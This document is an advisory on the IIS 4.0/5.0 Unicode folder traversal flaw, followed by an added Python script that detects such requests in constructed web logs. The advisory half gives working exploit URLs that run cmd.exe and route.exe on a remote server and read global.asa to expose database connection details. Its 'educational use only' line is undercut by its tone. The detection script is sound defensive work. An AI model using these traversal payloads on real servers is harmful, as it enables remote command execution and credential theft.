Products Affected: Internet Information Services (IIS) 4.0 & 5.0
OS: Windows NT, Windows 2000
Description:
Run commands remotely on IIS
This article describes the "Web Server Folder Traversal"
security vulnerability in Internet Information Server (IIS).
Advisory:
By simply passing a URL to an exploitable machine you can run
any command directly on the remote machine. Remember this is for EDUCATIONAL
USE ONLY and should only be run on your own machine.
For example:
First, you can list all the files in a directory by using this (replace
localhost with the domain name of the server):
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+dir+C:
You can list the contents of any directory on the system by changing "C:"
to another path, for example c:\inetpub.
Now, for more advanced users, you can run commands by using:
http://localhost/scripts/..%c1%9c../winnt/system32/route.exe?PRINT
This example will print a copy of the routing table directly to your
browser. You can run any exe that produces output from this line,
such as netstat, ipconfig, tftp, etc.
Now let's say you find something interesting on the machine's hard drive;
for example, a crappy ASP programmer will use global.asa to hold all the
database connection info. Now if you're curious enough and you're familiar
with IIS, you know where to find this; I'm not going to hold your hand.
To view files of interest you would simply use this URL:
http://localhost/scripts/..%c1%9c../winnt/system32/cmd.exe?/C+type+C:\inetpub\wwwroot\directory\global.asa
This will 'type' the file's contents to your browser; in other words,
you can view all the source code instead of having it executed on the server.
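From the defender's side, the telltale sign of this traversal in request logs is a percent-encoded overlong UTF-8 sequence (%c1%9c for '\', %c0%af for '/') that a permissive decoder turns into a path separator after the "../" checks have already run, so the decoded path climbs above the web root and lands on an executable under system32. The following Python is an added example, not part of the advisory or of any IIS tooling: it decodes request paths the permissive way, flags the overlong lead bytes, and scans a handful of constructed W3C-style log lines. It assumes the log still carries the raw, percent-encoded cs-uri-stem (as a proxy or IDS capture would); the field layout and all sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample of IIS W3C-style log lines (fields: date time c-ip
# cs-method cs-uri-stem cs-uri-query sc-status). Not taken from a real server;
# the first two request lines mirror the URLs quoted in the advisory above.
SAMPLE_LOG_LINES = [
    "2000-10-18 03:15:01 10.0.0.5 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /C+dir+C: 200",
    "2000-10-18 03:15:07 10.0.0.5 GET /scripts/..%c0%af../winnt/system32/route.exe PRINT 200",
    "2000-10-18 03:16:22 10.0.0.9 GET /index.asp - 200",
    "2000-10-18 03:17:02 10.0.0.9 GET /images/logo.gif - 304",
    "2000-10-18 03:18:45 10.0.0.7 GET /scripts/../../winnt/system32/cmd.exe /C+dir 404",
]

EXECUTABLE_RE = re.compile(r"\.(exe|com|bat|cmd)$", re.IGNORECASE)


def lenient_utf8_decode(raw: bytes) -> str:
    """Decode 2-byte UTF-8 sequences without rejecting overlong forms.

    This mimics the permissive decoding the traversal relied on:
    C1 9C decodes to '\\' and C0 AF to '/', both of which a strict decoder
    refuses. Other bytes are passed through one-to-one (Latin-1 style).
    """
    out = []
    i = 0
    while i < len(raw):
        b = raw[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def has_overlong_utf8(raw: bytes) -> bool:
    """Lead bytes C0 and C1 can only begin an overlong 2-byte sequence, which
    well-formed UTF-8 never contains, so their presence is a signal by itself."""
    return any(b in (0xC0, 0xC1) for b in raw)


def escapes_root(decoded_path: str) -> bool:
    """Walk the path segments after normalising '\\' to '/'; a '..' that pops
    above the web root means the request reaches outside the site."""
    depth = 0
    for seg in decoded_path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyze_stem(stem: str) -> list:
    """Return the reasons a request path looks like folder traversal
    (an empty list means nothing suspicious was seen)."""
    raw = unquote_to_bytes(stem)
    decoded = lenient_utf8_decode(raw)
    reasons = []
    if has_overlong_utf8(raw):
        reasons.append("overlong-utf8")
    if escapes_root(decoded):
        reasons.append("escapes-webroot")
    if EXECUTABLE_RE.search(decoded):
        reasons.append("executable-target")
    return reasons


def parse_w3c_line(line: str):
    """Split one log line into its seven fields; return None if malformed."""
    fields = line.split()
    if len(fields) != 7:
        return None
    _date, _time, ip, method, stem, query, status = fields
    return {"ip": ip, "method": method, "stem": stem,
            "query": query, "status": int(status)}


def scan_log(lines) -> list:
    """Return (client ip, raw stem, reasons) for every suspicious request."""
    hits = []
    for line in lines:
        rec = parse_w3c_line(line)
        if rec is None:
            continue
        reasons = analyze_stem(rec["stem"])
        if reasons:
            hits.append((rec["ip"], rec["stem"], reasons))
    return hits


if __name__ == "__main__":
    for ip, stem, reasons in scan_log(SAMPLE_LOG_LINES):
        print(f"{ip} {stem} -> {', '.join(reasons)}")
```

The three checks are deliberately independent: the overlong lead bytes alone are worth an alert even when the request was rejected, because legitimate clients never emit them, while the root-escape check also catches the plain "../.." variant that the server blocked (the 404 line above) and so shows the attempt even when it failed.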